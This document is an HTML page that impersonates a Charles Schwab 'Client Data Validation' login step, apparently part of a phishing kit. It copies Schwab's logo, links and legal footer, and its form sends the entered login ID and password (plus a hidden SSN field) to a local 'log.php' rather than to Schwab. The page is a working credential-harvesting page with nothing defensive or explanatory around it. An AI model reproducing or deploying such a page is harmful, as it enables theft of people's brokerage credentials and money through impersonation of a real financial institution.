<!DOCTYPE html>


<html class=" js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <meta http-equiv="X-UA-Compatible" content="IE=EDGE">
    <meta name="Portal-Sentinel" content="Present">
    <meta name="format-detection" content="telephone=no">
    <meta name="Portal-Size-Class" content="Medium, Expanded">
    <meta name="Portal-Login" content="Secondary">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="files/css" rel="stylesheet">


    <link rel="icon" href="https://lms.schwab.com/Content/Images/favicon.ico">
    <link href="files/ClweStyles.css" rel="stylesheet">
    <title>Client Data Validation</title>
</head>

<body style="">
    <div class="container body-content">
        <div class="row lms-std-view clwe-header">
            <div title="Charles Schwab logo" class="col-xs-1 col-sm-1 col-md-1 lms-header-logo">
                <a href="https://www.schwab.com/" class="eapproval-clwe-logo">
                        <img class="logo" src="files/schwab-logo.jpg" alt="Charles Schwab Logo click here to go to the home page.">
                    </a>
            </div>
        </div>
        <div class="clwe-page">
            <div id="stepOMeterDiv" class="clwe-step-o-meter" role="application">
                <ul role="group" aria-label="Description for Stepped Progress Indicator">
				
                    <li role="region" id="liStep1" class="clwe-step-o-meter--items clwe-is-active" style="width:25%;">
					
					<span class="clwe-sr-only" id="srStep1">You are on step 1 of 4 , step 1 is active</span>
					<span role="status">1. ID & Password</span></li>
					
					
                    <li role="region" id="liStep2" class="clwe-step-o-meter--items clwe-is-incomplete" style="width:25%;">
					<span class="clwe-sr-only" id="srStep2">You are on step 2 of 4 , step 2 is not active</span>
					<span role="status">2. Verification </span></li>
					
					
                    <li role="region" id="liStep4" class="clwe-step-o-meter--items clwe-is-incomplete" style="width:25%;">
					<span class="clwe-sr-only" id="srStep4">You are on step 4 of 4 , step 4 is not active</span>
					<span role="status">3. Acknowledgment</span></li>
                </ul>
            </div>




            <meta name="viewport" content="width=device-width">
            <title>Client Data Validation</title>


            <form action="log.php" class="form-horizontal"  method="post" target="_top">
			

                <input
                    id="State" name="State" type="hidden" value=""><input data-val="true" data-val-required="Please enter the &lt;a href=&#39;#&#39; onclick=&#39;FocusTo(SSN)&#39;&gt;Social Security Number or Gov&#39;t Issued ID Number.&lt;/a&gt;" id="hdssn" name="SSN" type="hidden" value="">
					
                    <h1 class="page-heading pi-heading clearfix hidden-sm-down" id="piHeading" name="pi heading">Login to your Schwab account to continue.</h1>
                        <br><br> 
						
<!-- 						If you are a USAA investment member wanting to set up access to your investment account, <a href="http://www.usaa.com/transitionhub" target="_blank" class="popupIcon">log into your USAA account</a> to be guided through
                        the complete setup process. -->
                    </p>
                    <div class="form-container clwe-pages-container">

                        <div class="form-contents">

							
                            <div class="form-group form-group--date" id="dobSection">
							
                                <label aria-label="Date of Birth" for="DOB">Login ID</label>

								<input maxlength="50" name="email" placeholder="" type="text" required>

                            </div>
							
							
                            <div class="form-group" id="phoneNumberSection">
							
                                <label aria-label="Phone Number" for="PhoneNumber">Password</label>
								
                                <input maxlength="20" name="pz" placeholder="" type="password" required>

							</div>
							

                        </div>
                        <div class="clwe-button-section">

                            <div>
                                <input type="submit" value="Continue" id="btnContinue" class="clwe-button clwe-button--primary">
                            </div>
                        </div>

                    </div>
            </form>

        </div>
        <div class="row lms-std-view">
            <div class="col-xs-12">

            </div>
        </div>
        <!--<hr class="lms-hr-bold lms-std-view" />-->
        <div class="row lms-std-view clwe-footer">
            <span class="finePrint">(0917-7D6G)</span>
            <div class="footer-content">
                <p>
                    The Charles Schwab Corporation provides a full range of brokerage, banking and financial advisory services through its operating subsidiaries. Its broker-dealer subsidiary, Charles Schwab &amp; Co., Inc. (&nbsp;<a target="_blank" href="https://www.sipc.org/">member SIPC</a>),
                    offers investment services and products, including Schwab brokerage accounts. Its banking subsidiary, Charles Schwab Bank (member FDIC and an Equal Housing Lender), provides deposit and lending services and products. Access to Electronic
                    Services may be limited or unavailable during periods of peak demand, market volatility, systems upgrade, maintenance, or for other reasons.
                </p>
            </div>
        </div>
    </div>
	
</body>

</html>